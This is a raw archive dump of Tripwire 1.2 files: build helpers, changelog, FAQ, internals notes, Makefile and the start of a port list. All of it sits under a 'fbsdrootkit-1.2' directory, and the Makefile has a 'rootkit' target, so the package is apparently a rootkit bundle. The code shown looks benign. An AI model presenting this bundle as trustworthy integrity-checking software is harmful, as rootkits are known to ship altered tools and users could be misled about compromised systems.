void main(argc, argv) int argc; char *argv[]; { struct stat statbuf; int size; pc = argv[1]; if (argc < 2) usage(); if (strcmp(pc, "mode_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_mode)); } else if (strcmp(pc, "ino_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_ino)); } else if (strcmp(pc, "nlink_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_nlink)); } else if (strcmp(pc, "uid_t") == 0) { isunsigned = 0; typeis(sizeof(statbuf.st_uid)); } else if (strcmp(pc, "gid_t") == 0) { isunsigned = 0; typeis(sizeof(statbuf.st_gid)); } else if (strcmp(pc, "off_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_size)); } exit(0); 
} void typeis(i) int i; { int shortlen = sizeof(unsigned short); int longlen = sizeof(unsigned long); char sign[64]; #ifdef ATT_3B2 /* ATT 3B2: Thanks Joe Sirrianni */ strcpy(sign, "unsigned"); #else if (isunsigned) strcpy(sign, "unsigned"); else strcpy(sign, "signed"); #endif if (i == shortlen) printf("typedef %s short %s;\n", sign, pc); else printf("typedef %s long %s;\n", sign, pc); } fbsdrootkit-1.2/tripwire-1.2/aux/types.sh100700 764 764 2271 5532334022 15574 0ustar dfdf#!/bin/sh # $Id: types.sh,v 1.3 1994/02/22 07:45:22 gkim Exp $ # types.sh # # glean any missing struct stat typedefs. # # Gene Kim # Purdue University # October 18, 1992 # this used to be a -x test, but Apollos can't process it! if test ! -f ./types then echo "You must do 'make' first!" exit 1 fi CPP=${1?"Run from the makefile!"} TYPES=./ourtypes.h # build our own local copy of types.h cat > gettypes.c << 'GHK' #include #include GHK $CPP gettypes.c > $TYPES rm -f gettypes.c # print out banner for inode.h cat << 'GHK' /* * inode.h * * Do not modify this file. This file was automatically * generated by the Tripwire makefile. * */ GHK # now start finding the missing typedefs grep mode_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types mode_t; fi grep ino_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types ino_t; fi grep nlink_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types nlink_t; fi grep uid_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types uid_t; fi grep gid_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types gid_t; fi grep off_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types off_t; fi rm $TYPES exit 0; fbsdrootkit-1.2/tripwire-1.2/COAST.info100600 764 764 4231 5630546444 15036 0ustar dfdfTripwire is a product of the COAST group at Purdue. 
The COAST (Computer Operations, Audit, and Security Technology) project at Purdue is a multi-researcher, multi-project group focused on security tool development and technology transfer, education, network security, security evaluation and assurance, policy and protocol development, and incident response. We're trying to direct the majority of our attention to solutions to important problems in both present and future non-classified systems. We are particularly interested in collaboration with commercial and government entities with real-world problems we can try to solve. Our group includes faculty from CS and EE, and support from several outside sources. In addition to the faculty, several top students are working on COAST projects in intrusion detection, network protocols, virus detection, integrity management, secure patch distribution, and authentication. We have other projects we expect to begin in the near future. In addition to our existing COAST resources at Purdue, we're able to draw on expertise from other faculty and research groups within the department and university, including the Software Engineering Research Center and the Parallel and Distributed Systems group. Support for COAST is in the form of gifts and donations, directed grants, scholarships, and contracted research. We recognize three levels of sponsorship, based on contribution. We encourage donation of security-related software and hardware to our lab for use in our on-going research and education programs. Information on COAST can be found with WWW: http://www.cs.purdue.edu/homes/spaf/coast.html You can ftp a PostScript copy of a more complete precis describing COAST from coast.cs.purdue.edu as /pub/COAST/What_is_COAST.PS A paper copy can be mailed on request. We are currently seeking sponsors for additional COAST projects. Interested parties are invited to look at the precis document for details, or to call for more information. 
-- Professor Eugene Spafford COAST Project Director Department of Computer Sciences Purdue University West Lafayette, IN 47907-1398 spaf@cs.purdue.edu 317-494-0739 fax 317-494-7825 office fbsdrootkit-1.2/tripwire-1.2/Changelog100600 764 764 52703 5630546452 15150 0ustar dfdf# $Id: Changelog,v 1.51 1994/08/30 06:09:46 gkim Exp $ The following is the official list of changes between revisions: 1.2 (release) Tue Aug 30 01:06:08 EST 1994 Added README.FIRST, changed COAST.info, fixed FAQ. (thanks Spaf) Added revised designdoc.ps from CCCS conference. (thanks Spaf) 1.2 (pre-release) Fri Aug 26 01:04:23 MST 1994 fixed prompting error when answering "Y" or "N" during interactive updates. (thanks Terry Kennedy) fixed prompting error when answering "help" during interactive updates. (thanks Terry Kennedy) more documentation changes. (thanks Spaf) included twdb_newinode.pl script for people using fsirand. (thanks Spaf) purged old email addresses from release. (thanks Spaf) updated Ported file. (thanks Asokan) purged LITTLE_ENDIAN define from haval. (thanks Greg Black, Eugene Zaustinsky) figured out problems with flex. (thanks Greg Black and Vernon Paxson) added tw.conf for Irix. (thanks Keith Rickert) added twdb_check.pl utility. (thanks Tom Orban, Terry Kennedy, Spaf) 1.2 Mon Jul 25 11:03:29 EST 1994 fixed manual page install that removes files. (thanks Eugene Zaustinsky) fixed flex problems. (Finally!) fixed numerous small problems in code exposed by CodeCenter and alint. (thanks Spaf) fixed the definition of the SHA algorithm to conform to the updated NIST FIPS 180. (thanks Spaf, indirectly thanks to Steve Bellovin and Bruce Schneier) added kludge shell script to fix flex/lex script based on version in use. (thanks Spaf) more corrections to documentation. (from Spaf) 1.2beta5 Tue Jul 19 19:42:18 EST 1994 fixed symbolic link handling for machines w/o symbolic links. (thanks Keith Rickert) fixed configuration file reading routines. 
(thanks Keith Rickert) merged Spaf's documentation changes. added acknowledgements to testers to WHATSNEW and README. added references to SANS and AppDev papers. added support for BSDI. (thanks Eugene Zaustinsky) added support for Linux. (thanks Cal Page) another attempt to merge flex and lex files. 1.2beta4 Sat Jul 16 23:50:12 EST 1994 fixed SEEK_SET funkiness. (thanks Spaf) updated README, FAQ files. (thanks Spaf) added PGP signature to distribution. (thanks Spaf) 1.2beta3 Sat Jul 16 14:44:22 MST 1994 fixed list and database update routines to make Purify happy. fixed Haval signature printing on little-endian machines. (thanks Asokan) added better includes for . (thanks Spaf) replaced #elif directives with #ifdefs in Haval files. (thanks Spaf) fixed remaining word size problems. (thanks Asokan) fixed HP configuration file. 1.2beta2 Sun Jul 10 20:46:03 MST 1994 added code for new GNU flex/bison to ./contrib. What a nightmare. we need to figure out how to merge this stuff. (thanks Cal Page) merged code to support non-32bit longs in signature and Tripwire code. Among other things, this allows Tripwire to run the Alpha. (thanks Asokan) added support for Haval signature routine. (thanks Spaf) fixed filename escaping error in filename_escape_expand(). (thanks Kevin Wang) fixed "too many files open" error caused by @@includes. (thanks Thomas Kroeger and Spaf) added support for Motorola versions of Unix. (thanks Kevin Johnson) added support for SCO Open Desktop. (thanks Mark Kohler) added Makefile support for SCO. (thanks Alain Williams) changed manual pages to make less BSD-ish. (thanks Alain Williams) changed README to describe Haval. fixed list routine so clobbered entries retain their flag and priority values. changed all signature routines to use stdio routines for I/O. I've observed test suite runs speeding up by over 2x! (thanks Casper H.S. Dik) 1.2beta1 Sun Mar 27 17:25:04 MST 1994 integrated new list routines. 
(thanks Paul Hilchey) added support for HP Context Dependent Files. (thanks Cory Cohen) added ./contrib/README.cdf file. added files in ./contrib to fully support newer versions of flex/bison. (thanks Calvin Page) fixed references to twconvert and new databases. updated twconvert. 1.1.1beta2 Thu Feb 24 19:00:00 EST 1994 updated database number. fixed list routines to handle dbase entries better. (thanks Tom Orban) fixed symbolic link handling. (thanks Paul Szabo) fixed top-level Makefile. (thanks Calvin Page) fixed more Linux-isms. (thanks Calvin Page) fixed escaped filenames in added/deleted/changed file reporting. added warning about using specified dbasefile files in database initilization mode. (thanks Calvin Page) fixed error database file checking with "-d -" flag. (thanks Jason Downs) 1.1.1beta1 Tue Feb 22 21:46:02 MST 1994 rewrote list_set() and fixed list_unset(). (thanks Alain Brossard) added signature checking for symbolic link contents. (thanks Paul Szabo) fixed configfile_read() to reuse open file descriptors, so configuration files are not parsed more than once. added test for table of contents in dbase files. fixed internal filename handling routines. (thanks Paul Szabo) fixed test.sh so Apollos can run it. (thanks Paul Szabo) fixed temporary filename generation (I'm finding stdio's L_tmpnam increasingly suspicious). changed the way input file descriptors and named pipes are handled. (thanks Tom Orban) fixed hex printing routines in MD5, MD4, and MD2. (thanks Dan Bernstein and Spaf) fixed an "database file missing" error message in main.c. (thanks Rich Cohen) added note to config.h file about using "-c" ignore-masks for some backup programs. (thanks Spaf) fixed tw.config manual page. (thanks Spaf) added better support for Linux. (thanks Calvin Page) added better Solaris support in Makefile. added better support for Apollo Domain/OS. (thanks Paul Szabo) added better support for BSD/386. added notes for HPUX problems. 
(thanks Eric Boehm) fixed static allocation in lexer. 1.1 Wed Dec 15 01:06:07 EST 1993 changed b64 representation yet again. (thanks Spaf) changed dbaseversion number up to 3. (thanks Spaf) reading in old database sooner for more timely error messages. fixed missing L_tmpnam. updated manual pages. fixed siggen to better handle stdin. 1.1.beta5 Sun Dec 12 22:32:38 EST 1993 converging on Tripwire v1.1 release. (thanks Spaf) 1.1.beta4 Fri Dec 10 16:55:00 EST 1993 changed DB_VERSION_NUM to 2. added program twconvert to help convert to Tripwire format. added better handling for old dbase formats. removed opportunity for temporary database file spoofing. (thanks Matt Bishop) fixed inconsistent storage of dbase table of contents when updating the database. (thanks Eric Berggren) added better fatal error messages. fixed documentation and manual pages. (thanks Spaf) added -dfd option to specify open file descriptor for database files. (thanks Spaf) 1.1.beta3 Thu Dec 2 11:58:13 EST 1993 fixed interactive update oddities. (thanks Sam Gassel) fixed database not found error. (thanks Sam Gassel) added interactive test suite. added @@include to preprocessor test suite. made interactive update messages more human readable. 1.1.beta2 Fri Nov 26 06:16:52 EST 1993 fixed usage message. (thanks Drew Gonczi) fixed @@ifhost warning messages. (thanks Chris Kern, Jason Downs) fixed non-inheritance of new tw.config ignore-masks when doing updates. (thanks Berggren) fixed notice of SHA code optimization in WHATSNEW. (thanks Rik Farrow) added more thorough SunOS tw.conf.sun file. (thanks Rik Farrow) (old file moved to tw.conf.sun.old) fixed output of @@contents. allows @@{varname} expressions in parser. (thanks Spaf and Jim Napier) added reporting of symbolic link file types in integrity check report. "-rwxrwxrwx" now is correctly shown as "lrwxrwxrwx" (thanks Jim Napier) expanded preprocessor test suite. expanded update test suite. fixed "-d -" error case. 
(thanks Bruce Jolliffe and Drew Gonczi) got the Encore Multimax users running at last. (thanks Georges Tomazi) corrected preprocessor filename tracking, and error/warning messages. (thanks Eric Berggren) 1.1beta Sun Nov 14 00:32:17 EST 1993 made quietmode (-q) really quiet. (thanks Spaf) added exit status to indicate filesystem changes (see manual page). added support for ">" template for growing files. (thanks John Rouillard) fixed -update to add files in a more intelligent manner. fixed problem of `Hint: can't find database...' error message. changed "-update" logic. is now correct. all entries are now added if not in configuration file. all entries now are added with reasonable ignore mask. moved macro expansion into lexer. now, it really works. (thanks Spaf) this works too: @@foo/@@dir @@ignore added warning to catch partially-qualified @@ifhost directives. (thanks Baron Fujimoto) fixed root-anchoring problem that caused files to be scanned twice. (thanks John Rouillard) fixed handling of files with embedded spaces. (thanks Alain Brossard) added warning about possible overflows when building byteorder.h. (thanks Alain Brossard) fixed typo in tw.config(5) manual page. (thanks Eric Bergren) fixed handling of undefined macros. (thanks Patrick Sullivan) fixed misreporting of unchanged entries. fixed ./man install rule. (thanks Nora Hermida) changed the way filename are stored in lists to handle special characters in databases. got rid of misleading variable and function names in source. fixed boundary condition in list.c (removing head or tail of the list wasn't reflected in the hash table structure.) fixed Makefile dependencies for siggen. fixed entry number problem chaged order of file operations to allow -E to run w/o dbasefile. 1.0.5 Thu Sep 30 05:08:33 EDT 1993 fixed crc32 -- it didn't rewind the file descriptor. (thanks Eugene Zaustinsky) changed base64 alphabet. (thanks Eugene Zaustinsky) fixed filename escaping bug. 
fixed routines in list library that improperly handled case where items are clobbered. this caused files to appear on both the added and deleted lists in Tripwire. backed out '/dir/dir/@@variable' change. it breaks 'file @@ignore'! (thanks Bert Lindgren) updated README. 1.0.4 Wed Aug 18 23:02:14 EDT 1993 added support for '-cfd fd' option to allow open file descriptor to be specified for configuration file. (thanks Spaf) added SHS/SHA Secure Hash Algorithm to Tripwire distribution. changed CRC32 code to POSIX 1003.2 compliant signature (thanks Dan Bernstein) updated FAQ. (thanks Pat Macdonald, Eric Demerling). changed log-file template to ignore changes in inode ctime. (thanks John Rouillard) added support for Solaris 2.2/SunOS 5.2. (thanks Bob Cunningham) fixed another POSIX realloc() misuse, this time in -interactive code. (thanks E. Clinton Arbaugh) fixed lexical analyzer to allow '/dir/dir/@@variable' to expand correctly. (thanks Neil Todd) fixed grammar to make sure you can have @@variables in the middle of strings. (thanks John Rouillard) fixed MD4, MD5, MD2 code. finally got it right with a lot of cajoling and hand-holding. (thanks Eugene Zaustinsky) fixed Snefru code, backing out speedups to match Ralph Merkle's code more closely. added a rigorous signature test suite that is run before checking test database. changed name of sigfetch to siggen. added corresponding manual page and defunctified sigfetch manual page. (thanks Spaf) fixed siggen to use SIGNAME constants in config.h. siggen now gives a list of signature number to signature name mappings in usage message. changed ./src/Makefile CFLAGS option (thanks Spaf) changed test suite so it won't run from bottom-level makefile. changed test to ascertain whether '-cfd fd' was given a legit fd. 
changed test tw.config file to cover new files and uncover the files that we know will change (config.h, et al) (limited release for testing purposes) 1.0.3: Tue Apr 27 18:40:54 EST 1993 added 'tripwire -interactive' to allow users to be asked whether each added, deleted, or changed file should be updated. added help function in '-interactive' mode and '-help' that describes each inode field. (thanks John Rouillard) implemented a more consistent 'tripwire -update' routine that takes care of added, deleted, and updated entries. fixed incorrect 'tripwire -update' when used with symbolic links. (thanks E. Clinton Arbaugh) implemented printhex functionality in all signature routines. updated README and manual pages to refelct new modes. fixed MIPS/RISC-OS settings in Makefile. (thanks John Rouillard) fixed aux/Makefile clean and top-level Makefile. (thanks John Rouillard) fixed MD4 code -- I was thoroughly confused by the odd conventions used in this routine. (thanks Eugene Zaustinsky) chose more opportune time to print backup warning banner in '-update' mode. added AT&T 3B2 family of machines to ./configs directory and generalized routines for machines that don't have gettimeofday(). (thanks Joe Sirrianni) increased size of too-small char array in preen.c. (thanks Bob Hutchinson) changed filelist variable names to much more descriptive names. added machine-generated banner to ./aux/byteorder.c. fixed description of database file in ./includes/config.h. fixed 'sigfetch' utility to return correct error codes. added RCS tags to some straggler files. 1.0.2: Thu Dec 10 05:45:48 EST 1992 fixed @@ifhost xxx problem which dumped core. (thanks Rich Asmuth) fixed realloc() problem. (thanks Beth Elias and Joe Ramus) fixed -update problem which caused Tripwire to forget all about special files. (thanks Joe Ramus) fixed Changelog. I forgot about the Makefile fix. (thanks Tom Orban) more useful error message when Tripwire can't find configuration file. 
fixed 'tripwire -update' so it adds files explicitly specified on command line, but not in database. (thanks Drew Gonczi) Note that this needs some work -- we'll need to have an -add and -delete option to make this functionally clean and preserve database/tw.config semantics. first official patch :-) 1.0.1: Mon Nov 23 15:58:50 EST 1992 fixed placement of backup database file in database update mode. fixed install target in ./src and ./man Makefiles. (thanks Hugo Cartaxeiro) changed Ported entries for Pyramids. (thanks Peter Riili) fixed Acknowledgements section in README. (thanks Michael Barnett) fixed temporary filename generation problem. (thanks Gene Spafford) fixed DIST variable in ./tests Makefile. fixed typo in config.pre.y that prevented compilation with bison. first official release 1.0: Tue Nov 3 02:35:17 EST 1992 reorganized distribution into heirarchy. changed pathnames (./Tests -> ./tests, ./Databases -> ./databases). tripwire now creates ./databases directory if it doesn't already exist when -initialize. finished TODO list. ended beta testing period 0.92 beta 6: Tue Oct 20 14:55:03 EST 1992 attempting to fix macro recursion problem. (thanks Shabbir Safdar) fixed 'make test' variable assignment problem. (thanks Tom Gutnick) fixed lstat()/SVR3 problem. (thanks Simon Leinen) 0.92 beta 5: Sun Oct 18 19:33:19 EST 1992 integrated substantial source code cleanup patch. (thanks Ken McDonell) added types.c to glean struct stat info. added -i #|all flags, to specify which signatures to skip. this feature was added to make running Tripwire on an hourly basis reasonable. i.e., on hourly runs, check only CRC's. On daily runs, check md5. On weekly runs, check all signatures. (thanks John Rouillard) fixed usage message, and -D and -U error handling. added "-initialise" for people who don't speak American. :-) (thanks Michael Barnett) got signature object file dependencies right, finally. 0.92 beta 4: Fri Oct 16 18:32:36 EST 1992 the day of patch-infamy. 
a one-line fix to stop tripwire from saying all filenames are not absolutely qualified. *sigh* 0.92 beta 3: Fri Oct 16 18:02:59 EST 1992 fixed Makefile rule. (thanks Rich Salz) fixed duplicate yacc token. (thanks Rich Salz) fixed qualified filename bug. (thanks Ken McDonnel) removed htonl(), ntohl() routines in utils.c. added -D, -U flags to do command-line defines and undefines. (thanks John Rouillard) added more checks for null lists in list.c. @@ifdef and @@ifhost support logical expressions: @@ifdef (x || y && (z1 && (z2))) is now legal in tw.config grammar. @@ifhost (x || y && (z1 && (z2))) is now legal in tw.config grammar. added line continuation with '\' in tw.config grammar. added @@echo for testing. maybe we'll keep it? default ignore flags and templates now ignore signatures 3-9. added [()|&] as characters that need to be escaped in database. fixed filename_escape_expand(). 0.92 beta 2: Fri Oct 16 12:18:28 EST 1992 finally fixed up '=' pruning. (thanks David Wiseman) added Porting database. added transient file handling in config.parse.c. fixed comment handling in config.parse.c. merged gazillions of platform dependencies. let's hope everything still works. reorganized Makefile so it's easier to spot your own platform, I hope. make Tripwire compiles bearable for systems w/o BSD filesystems. various semantic and lint cleanups. reorganized phase 3 presenation. more verbose, hopefully clearer. (thanks Christopher Samuel) added user-contributed tripwire.config files. purged >14 character filenames: database.build.c -> dbase.build.c tripwire.config -> tw.config tripwire.database_@ -> tw.db_@ ^^-- room for 9-character hostname added COPS interface in ./contrib. (thanks Shabbir Safdar) added "-f dbasefile" option to specify alternate dbase file. (allows "-f -" to read from stdin.) added "-c configfile" option to specify alternate config file (allows "-c -" to read from stdin.) added code to escape filenames starting with '#'. 
added tw.config preprocessor directives: @@ifhost @@define x VAR @@undef x @@ifdef x @@endif @@include ...and variable substitution (@@x --(turns into)--> VAR) added "-E" or "-preprocess" to print out processed tw.config file. (ala "cc -E" or "cpp".) added incremental database. (-update entry) md5 fix for Cray. (thanks John Cristy) AIX fix for stat structure. (thanks Shabbir Safdar) config_interpolate() now caches vectors, instead of recomputing every time. tripwire now makes backup of files when doing "-update". played with profiler. halved the number of calls to strlen(). (I wonder if we can do the same with strcpy().) made backup file 14-character length friendly for SVR3 people. so, now tripwire is completely 14-character filename friendly, right? implemented tw.config parsing routines in lex and yacc added @@dbaseversion directive to specify what format the tw_db files use. this is to prevent reading in unknown database files. completed filename_escape_expand() to handle all sorts of escape sequences (escaped octals, cooked-style escaped characters, and all of tripwire's special characters [e.g., '\@']). added warning of null characters in filename. created consistent escaping and de-escaping of characters to and from database. sped up character escaping routines by using all table-lookups. moved database format strings into the header file. list generation sped up (1500 files in 20 seconds on Sequent). added tw.config.5 manual page, which describes the tw.config syntax and preprocessor directives. added @@else directive to tw.config parser. changed signature routines to return number in base-64. this has the unfortunate effect of making all the signatures look like pathnames, but it does make signature storage 6 bytes instead of 8 bytes. added support for 10 signatures. fixed tripwire -update. now skips directory entries when regenerating database. added CRC16 and CRC32 to signature routine repository. added "sigs.h" to make signature routines more general. 
added MD2 and MD4. changed 'make test' so no files are clobbered. fixed '-d dbasefile' bug. 0.9beta8: Thu Sep 17 19:06:18 EST 1992 eliminated use of 'sort' and 'diff', using list routines instead (fixed tripwire confusion in parsing '=' additions from diff which generated zillions of bogus changed file entries.) this speeds up Phase 3 considerably, since we don't sort! sped up linked-list/hash routines (HASHSZ increased by 100x) removed diff.sorted.c (thanks to the five people who tested this: David Wiseman, John Sutton, Lance Bailey, John Rouillard, David Smith). 0.9beta7: Thu Sep 10 20:45:02 EST 1992 fixed list initialization routine. fixed Makefile, README, manual page. fixed memory leak problems (spotted by Purify). fixed default ignore-masking handling bug. (didn't convert to internal form first) fixed ignore-mask parsing. (David Smith) added banner to Tripwire databases on creation. taught tripwire to say what version it is. sped up most commonly called routines (config_interpolate() and slash_count()). Thanks Rich Salz! 0.9beta6: Wed Sep 09 21:04:35 EST 1992 First version of Tripwire to see the light of day. fbsdrootkit-1.2/tripwire-1.2/FAQ100600 764 764 11554 5630546454 13671 0ustar dfdf# $Id: FAQ,v 1.19 1994/08/30 06:09:48 gkim Exp $ # # FAQ for Tripwire # This file answers frequently asked questions about Tripwire. The first section of the file covers Tripwire concepts and design, while the second section addresses troubleshooting. Concepts: ========= Q: Why doesn't Tripwire ever traverse across mounted filesystems? A: This is a feature. This behavior makes it possible to put a directory (e.g., '/') in your tw.config file, and you won't have to worry whether it will traverse all the locally-mounted filesystems. If you want it to do the whole filesystem, list each partition separately in the configuration file. Q: What is the difference between pruning an entry in your tw.config file (via "!") and ignoring everything (via the "E" template)? 
A: Ignoring everything in a directory still monitors for added and deleted files. Pruning a directory will prevent Tripwire from even looking in the specified directory. Q: Tripwire runs very slowly. What can I do to make it run faster? A: You can modify your tw.config entries to skip the Snefru signatures by appending a "-2" to the ignore flags. Or you can tell Tripwire at run-time to skip Snefru by: tripwire -i 2 This computationally expensive operation may not be needed for many applications. (See README section on security vs. performance trade-offs for further details.) Troubleshooting: ================ Q: I build Tripwire and the test suite fails. What do I do? A: Read the README section on "Common Compilation Problems." Q: Tripwire reports that my database version is out of date. What should I do? A: The database format used by Tripwire v1.2 changed. You need to rebuild the database with Tripwire v1.2; see the README file for details. Q: Where do I find Larry Wall's patch program? A: You can get it via anonymous FTP at ftp.uu.net:/pub/patch.tar.Z. Q: When running Tripwire in Integrity Checking mode, Tripwire fails when it tries to find a file with a name consisting of dozens/hundreds/thousands of '/'s. What went wrong? A: Your setting for the #define DIRENT value in your conf-.h file is probably incorrect. Try switching the setting and see if the problem goes away. (i.e., switch #define to #undef, or vice versa.) Q: I have /tmp in my tw.config file, but none of the files in the directory are being read by Tripwire. What's going on? A: Check to see that your /tmp directory isn't a symbolic link to another filesystem. When recursing down into directories, Tripwire never traverses symbolic links or enters another filesystem. Q: Is there any way I can get Tripwire to print out the names of the files as they are being scanned? I want to know which files Tripwire is spending all of its time crunching. A: Try using 'tripwire -v'. 
This wasn't documented in the first tripwire.8 manual page. Q: I try to initialize the database by typing 'tripwire -initialize' but I can't find the binary. Where is the tripwire executable? A: ./src/tripwire is where the binary is built. 'make install' will install in the $(DESTDIR) of your choice, as defined in the top-level Makefile. Q: I have the following line in my tw.config file to do host specific actions. Why doesn't it work? @@ifhost chapel || chekov || chewie || data || guinan .... @@endif A: You must put the hostnames as returned by 'hostname' or 'uname' (depending on whether you're running a BSD or SYSV derived OS). So, the correct form would be: @@ifhost chapel.enterprise.fed || chekov.enterprise.fed ... The Tripwire preprocessor tries its best to figure out if you have used misformed hostnames. Q. As part of my operational security plan for my exported NFS partitions, I want to run "fsirand" regularly. Unfortunately, if I do this, Tripwire will complain that every file has changed (because the i-node numbers will change). I don't want to rebuild the entire system database each time. What can I do? A. We have included a Perl script in the distribution that will go through a Tripwire db file (the output database) and update the i-node fields while leaving everything else the same. To use it, you need to modify the first line to point to your Perl interpreter (if you don't have Perl, you'll need to write your own program in C or get Perl from an ftp site). The Perl script is ./contrib/twdb_newinode.pl. After the next time you are in single-user mode running fsirand, run this script with the db as input. For example, cd /usr/local/adm/tcheck/databases ./twdb_newinode.pl tw.db_myhost It will automatically create a backup version of the file for you as a "just in case." *Afterwards, be certain to set the disk with the database back to read-only!!* Also, store the Perl script in the same secure place as the Tripwire program. 
Gene & Gene Kim & Spafford Last updated: July 17, 1994 (gkim@cs.purdue.edu) (spaf@cs.purdue.edu) fbsdrootkit-1.2/tripwire-1.2/INTERNALS100600 764 764 2767 5611471034 14575 0ustar dfdf As times passes since the initial release of Tripwire, memories fade, and things that I used to assume as obvious are no longer quite so clear. These are some notes I made to help me remember internal Tripwire implementation details. Surely other people besides myself might benefit from this. Adding new signature routines: ============================== Add the files under the ./sigs directory. Use the md4 directory as a template -- it needs to know what endian your machine is, which we glean at compile time in the Tripwire build. Use md4wrapper.c as a template for "wrapping" the signature routine to interface with Tripwire. Remember, if you use pltob64(), the signature string will already be null-terminated. However, when generating your hex signature, you'll have to manually affix a null. Look next at ./include/config.h. You'll need to change a couple of defines, namely the SIGxFUNC and SIGxNAME defines that tell Tripwire what function to call and what to name the routine. Next, edit ./src/Makefile and change the SIGxDIR, OSIGx, and CSIGx variables at the top of the Makefile. Lastly, add a line in the ./include/tripwire.h to include the signature prototype file. Don't forget to change the file ./tests/tw.conf.test to exclude those new object files from the Tripwire test suite. At the time of this writing, nine of the ten slots are taken. So maybe people won't have to (or be able to) add new signature routines in the future. :-) Gene Kim 10 July 1994 fbsdrootkit-1.2/tripwire-1.2/Makefile100600 764 764 7155 6273465303 14756 0ustar dfdf# $Id: Makefile,v 1.16 1994/07/25 15:59:41 gkim Exp $ # # Tripwire build # # See the README file before running this! 
# ### ### Start of user-modified settings ### Examine these and change the ones that need to be ### Altered on your system ### # destination directory for final executables DESTDIR = /secureplace/bin # destination for man pages MANDIR = /usr/man # system utilities LEX = lex #LEX = flex # For the GNU crowd YACC = yacc #YACC = bison -y # For the GNU crowd (make it look like yacc) # # see ./contrib/README.linux for tips on # # making work. # for SVR4 make (must be a Bourne-type shell) SHELL = /bin/sh #SHELL = /bin/ksh # Another common shell #SHELL = /bin/bash # For the GNU fanatics # you can use ANSI C if you like, but K&R is equally fine. CC = cc # common #CC = gcc # also common #CC = /usr/ccs/bin/cc # Pyramid DC/OSx (SVR4) CFLAGS = -O # common #CFLAGS = -g # common #CFLAGS = -g # debugging #CFLAGS = -O -cckr # SGI # NOTE: some versions of the HP C compiler optimizer breaks snefru.c! # consider recompiling this file seperately without optimization #CFLAGS = -O -Aa -N # HP/UX ansi #CFLAGS = -O -Ac -N # HP/UX K&R #CFLAGS = -O -Ac -N -Wl,-a,archive # HP/UX K&R, insure archived, static link #CFLAGS = -systype bsd43 # ETA/10 (SVR3) #CFLAGS = -systype bsd43 # MIPS RISC/OS 4.5x #CFLAGS = -O -ansi # gnu CC #CFLAGS = -O -ansi -W -Wreturn-type -Wswitch -Wshadow # gnu CC w/all warnings #CFLAGS = -OG # Pyramid OSx #CFLAGS = -O -Kold # Pyramid DC/OSx (SVR4) #CFLAGS = -DTW_TYPE32='int' # DEC OSF/1 Alpha (or any other architecture # where int [but not long] is a 32 bit quantity) # a C preprocessor (to build inode.h) CPP = $(CC) -E # common #CPP = /usr/lib/cpp # on older systems #CPP = /lib/cpp # on older systems # make sure libraries are not linked dynamically (as a security measure) LDFLAGS= # common #LDFLAGS= -non_shared # OSF/1 #LDFLAGS= -Bstatic # SunOS 4 (cannot statically link tripwire # on Solaris 2.3) #LDFLAGS= -dn # Pyramid DC/OSx (SVR4) # libraries LIBS = # common #LIBS = -lsocket # SCO #LIBS = -lmalloc -lsun -lc_s # IRIX 4.0 #LIBS = -lx # Xenix #LIBS = -lbsd # MIPS 
RISC/OS #LIBS = -lgnumalloc # Encore / UMAX V # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /usr/bin/install # common #INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4) #INSTALL= /etc/install # Pyramid OSx #INSTALL= /bin/cp # no install #INSTALL= /usr/bin/installbsd # OSF/1 (DEC only?) # how you get hostname information (BSD vs. SYSV style) HOSTNAME = "hostname" # BSD #HOSTNAME = "uname -n" # System V ### ### End of user-modified settings ### You should not need to change anything after this ### DIST = tripwire-1.2 all: (cd aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) (cd src; make CC=$(CC) CFLAGS="$(CFLAGS)" LIBS="$(LIBS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) \ YACC="$(YACC)" LEX="$(LEX)" all) install: all (cd src; make INSTALL=$(INSTALL) DESTDIR=$(DESTDIR) install) (cd man; make INSTALL=$(INSTALL) MANDIR=$(MANDIR) install) test: all (cd tests; make HOSTNAME=$(HOSTNAME) DIST=$(DIST) SHELL=$(SHELL) \ CC=$(CC)) clean: (cd src; make clean) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core clobber: clean (cd src; make clobber) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core rm -f */*_pure_*.o sigs/*/*_pure_*.o rootkit: (cd src; make tripwire) fbsdrootkit-1.2/tripwire-1.2/Ported100600 764 764 26216 5620062005 14500 0ustar dfdf## $Id: Ported,v 1.17 1994/08/04 03:44:05 gkim Exp $ ## Following is an information list of machines to which ## Tripwire has been ported. This lists the OS environment, ## special flags, skeleton config file, and other info ## to enable you to get up and running. It is *not* quite ## complete because not every filesystem configuration will ## be represented in this list. ## ## Also, we credit (and thank again!) our beta testers who ## provided this information for the release. 
vendor: several (486/66 PC) os: 386BSD os version: 0.1 patchlevel 0.2.4 compiler: gcc and cc both work cflags: -O ldflags: libs: conf.h: conf_bsd.h tw.config: tw.conf.386bsd notes: contributor: Cor Bosman vendor: several (386/25 PC) os: linux os version: 0.99.14 compiler: gcc cflags: -O ldflags: libs: conf.h: conf-linux.h (the system default) tw.config: tw.linux notes: CC=gcc YACC=bison -y FLEX=flex contributor: Cal Page vendor: Apple os: A/UX os version: 3.x compiler: cc cflags: -O ldflags: libs: conf.h: conf-aux3.h tw.config: contributor: Phillip Porch (root@raidernet.com) vendor: AT&T os: System V os version: Release 3.2.3 compiler: cc cflags: -O ldflags: none conf.h: conf-3b2g.h tw.config: Working on one notes: Had to modify some source contributor: Joe Sirrianni vendor: AT&T os: System V os version: Release 4.0.3 compiler: cc cflags: -O ldflags: none conf.h: conf-3b2gr.h tw.config: Working on one notes: contributor: Joe Sirrianni vendor: Carnegie-Mellon University os: Mach os version: 2.x compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-mach.h tw.config: not available contributor: Peter Shipley vendor: Convex os: ConvexOS os 